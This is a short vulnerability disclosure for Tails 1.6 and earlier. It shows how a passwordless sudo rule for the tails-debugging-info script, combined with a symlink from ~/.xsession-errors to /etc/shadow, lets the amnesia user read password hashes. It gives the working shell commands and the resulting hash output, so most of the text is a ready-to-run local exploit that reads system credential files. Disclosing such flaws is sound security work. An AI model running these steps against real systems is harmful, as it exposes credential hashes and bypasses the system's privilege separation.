Tails 1.6 Information Disclosure

` Tails <= 1.6 tails-debugging-info information leak by cenobyte 2015  
<[email protected]>  
  
On Tails <= 1.6 it is possible to show the contents of /etc/shadow within the  
context of the amnesia user when a password is set for that user.  
  
The amnesia user can execute tails-debugging-info as root without a password  
using sudo (/etc/sudoers.d/zzz_tails-debugging-info):  
amnesia ALL = NOPASSWD: /usr/local/sbin/tails-debugging-info ""  
  
Note: Other commands executed as root using sudo which are not listed in the  
sudoers files require a password.  
  
There's a function in tails-debugging-info named debug_file() which serves as a  
wrapper around cat:  
debug_file() {  
echo  
echo "===== content of $1 ====="  
cat "$1"  
}  
  
debug_file() is called in tails-debugging-info with the following parameter:   
debug_file "/home/amnesia/.xsession-errors"  
  
The .xsession-errors file is owned by the amnesia user and can be deleted and  
replaced with a symlink to /etc/shadow:  
amnesia@amnesia:~$ rm ~/.xsession-errors  
amnesia@amnesia:~$ ln -s /etc/shadow ~/.xsession-errors  
  
Running sudo tails-debugging-info now displays the password hash of the amnesia  
user:  
amnesia@amnesia:~$ sudo tails-debugging-info 2>/dev/null | grep ^amnesia  
amnesia:$6$r0jt1v9E$UOrWbJ70qAH/sjaKfjmCMvkXZ19bqC2ieQ2UvYk0HKwVvgxuZFtyIwjoLfgH  
AwrZVM3a0NTEkcsQY1hn/Uq2S0:16710:0:99999:7:::  
`